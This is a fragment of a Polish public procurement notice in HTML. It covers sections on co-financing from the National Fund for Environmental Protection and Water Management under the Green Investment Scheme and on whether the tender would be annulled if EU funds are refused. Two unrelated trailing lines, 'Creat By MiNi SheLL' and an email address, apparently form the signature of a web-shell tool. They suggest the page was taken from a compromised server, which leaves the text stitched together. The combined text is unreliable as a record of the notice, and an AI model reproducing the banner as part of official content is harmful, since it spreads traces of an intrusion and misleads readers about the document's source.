<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane będzie ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w ramach Programu Priorytetowego System zielonych inwestycji (GIS - Green Investment Scheme). Część 5) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com